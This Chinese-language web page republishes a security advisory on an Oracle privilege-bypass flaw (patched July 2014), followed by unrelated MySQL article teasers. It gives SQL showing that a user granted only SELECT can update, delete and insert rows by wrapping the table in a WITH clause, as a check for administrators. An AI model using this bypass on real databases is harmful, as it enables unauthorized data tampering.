Oracle数据库高危漏洞警告！-mysql教程-PHP中文网

首页

数据库

mysql教程

Oracle数据库高危漏洞警告！

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 07, 2016 pm 04:00 PM

数据

最近在互联网上暴露出一个Oracle的高危漏洞，利用该漏洞，仅有查询权限的用户可以对数据进行增、删、改操作，非常危险。该漏洞影

各位用户，最近在互联网上暴露出一个Oracle的高危漏洞，利用该漏洞，仅有查询权限的用户可以对数据进行增、删、改操作，非常危险。该漏洞影响范围非常广泛，包括在国内最常见的11.2.0.3，11.2.0.4，12.1等版本。

该漏洞在2014年7月的CPU中被修正，但是如果用户未应用该CPU，则漏洞仍然存在。强烈建议您检查所有Oracle数据库，确认是否存在该安全风险。

云和恩墨在自己的测试环境中重现了该漏洞，云和恩墨的测试环境包括11.2.0.3，11.2.0.4，12.1.0.1这5个版本。您也可以通过以下步骤，检查数据库是否存在该漏洞。

（注：以下步骤仅供参考，原则上不会对数据库有任何影响，但是对于在生产环境中执行以下SQL可能产生的风险云和恩墨不负有任何责任）

1.首先创建基本测试用户，仅仅授予创建会话权限

SQL> create user test_update identified by test_update;

User created.

SQL> grant create session to test_update;

Grant succeeded.

2.将表查询权限赋予用户，注意很多产品环境中都存在类似设置

SQL> grant select on t to test_update;

Grant succeeded.

SQL> select count(*) from t;

COUNT(*)

----------

100

3.使用测试用户连接，验证普通的增、删、改权限被拒绝

SQL> conn test_update/test_update

Connected.

SQL> select * from enmo.t where rownum = 1;

----------

SQL> update enmo.t set id = 1 where id = 1;

update enmo.t set id = 1 where id = 1

ERROR at line 1:

ORA-01031: insufficient privileges

4.在WITH语句中，权限限制被完全绕过，增删改权限被获得

SQL> update (with tmp as (select id from enmo.t) select id from tmp) set id = 0 where id = 1;

1 row updated.

SQL> commit;

Commit complete.

SQL> delete (with temp as (select * from enmo.t) select id from temp) where id = 2;

1 row deleted.

SQL> insert into (with temp as (select * from enmo.t) select * from temp) select 2 from enmo.t where id =3;

1 row created.

5.在Oracle的CPU中，2014年7月的CPU中修改了该问题

由于很多用户不清楚CPU内容，，并未应用，所以产生高危的影响。以下是应用该CPU之后，应有的权限反应。

SQL> update (with tmp as (select id from enmo.t) select id from tmp) set id = 1 where id = 1;

update (with tmp as (select id from enmo.t) select id from tmp) set id = 1 where id = 1

ERROR at line 1:

ORA-01031: insufficient privileges

警告：由于很多用户对CPU安全补丁关注不足，所以系统中可能存在此高危风险，建议用户关注该漏洞，并及时采取相应举措。与此有关的CVE号包括：CVE-2013-3751、CVE-2014-4236、CVE-2014-4237、CVE-2014-4245、CVE-2013-3774 .

相关信息还可以参考Oracle的CPU页面：

本文永久更新链接地址：

声明

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系admin@php.cn

MySQL：初学者的基本技能Apr 18, 2025 am 12:24 AM

MySQL适合初学者学习数据库技能。1.安装MySQL服务器和客户端工具。2.理解基本SQL查询，如SELECT。3.掌握数据操作：创建表、插入、更新、删除数据。4.学习高级技巧：子查询和窗口函数。5.调试和优化：检查语法、使用索引、避免SELECT*，并使用LIMIT。

MySQL：结构化数据和关系数据库Apr 18, 2025 am 12:22 AM

MySQL通过表结构和SQL查询高效管理结构化数据，并通过外键实现表间关系。1.创建表时定义数据格式和类型。2.使用外键建立表间关系。3.通过索引和查询优化提高性能。4.定期备份和监控数据库确保数据安全和性能优化。

MySQL：解释的关键功能和功能Apr 18, 2025 am 12:17 AM

MySQL是一个开源的关系型数据库管理系统，广泛应用于Web开发。它的关键特性包括：1.支持多种存储引擎，如InnoDB和MyISAM，适用于不同场景；2.提供主从复制功能，利于负载均衡和数据备份；3.通过查询优化和索引使用提高查询效率。

SQL的目的：与MySQL数据库进行交互Apr 18, 2025 am 12:12 AM

SQL用于与MySQL数据库交互，实现数据的增、删、改、查及数据库设计。1）SQL通过SELECT、INSERT、UPDATE、DELETE语句进行数据操作；2）使用CREATE、ALTER、DROP语句进行数据库设计和管理；3）复杂查询和数据分析通过SQL实现，提升业务决策效率。

初学者的MySQL：开始数据库管理Apr 18, 2025 am 12:10 AM

MySQL的基本操作包括创建数据库、表格，及使用SQL进行数据的CRUD操作。1.创建数据库：CREATEDATABASEmy_first_db;2.创建表格：CREATETABLEbooks(idINTAUTO_INCREMENTPRIMARYKEY,titleVARCHAR(100)NOTNULL,authorVARCHAR(100)NOTNULL,published_yearINT);3.插入数据：INSERTINTObooks(title,author,published_year)VA

MySQL的角色：Web应用程序中的数据库Apr 17, 2025 am 12:23 AM

MySQL在Web应用中的主要作用是存储和管理数据。1.MySQL高效处理用户信息、产品目录和交易记录等数据。2.通过SQL查询，开发者能从数据库提取信息生成动态内容。3.MySQL基于客户端-服务器模型工作，确保查询速度可接受。

mysql：构建您的第一个数据库Apr 17, 2025 am 12:22 AM

构建MySQL数据库的步骤包括：1.创建数据库和表，2.插入数据，3.进行查询。首先，使用CREATEDATABASE和CREATETABLE语句创建数据库和表，然后用INSERTINTO语句插入数据，最后用SELECT语句查询数据。

MySQL：一种对数据存储的初学者友好方法Apr 17, 2025 am 12:21 AM

MySQL适合初学者，因为它易用且功能强大。1.MySQL是关系型数据库，使用SQL进行CRUD操作。2.安装简单，需配置root用户密码。3.使用INSERT、UPDATE、DELETE、SELECT进行数据操作。4.复杂查询可使用ORDERBY、WHERE和JOIN。5.调试需检查语法，使用EXPLAIN分析查询。6.优化建议包括使用索引、选择合适数据类型和良好编程习惯。

See all articles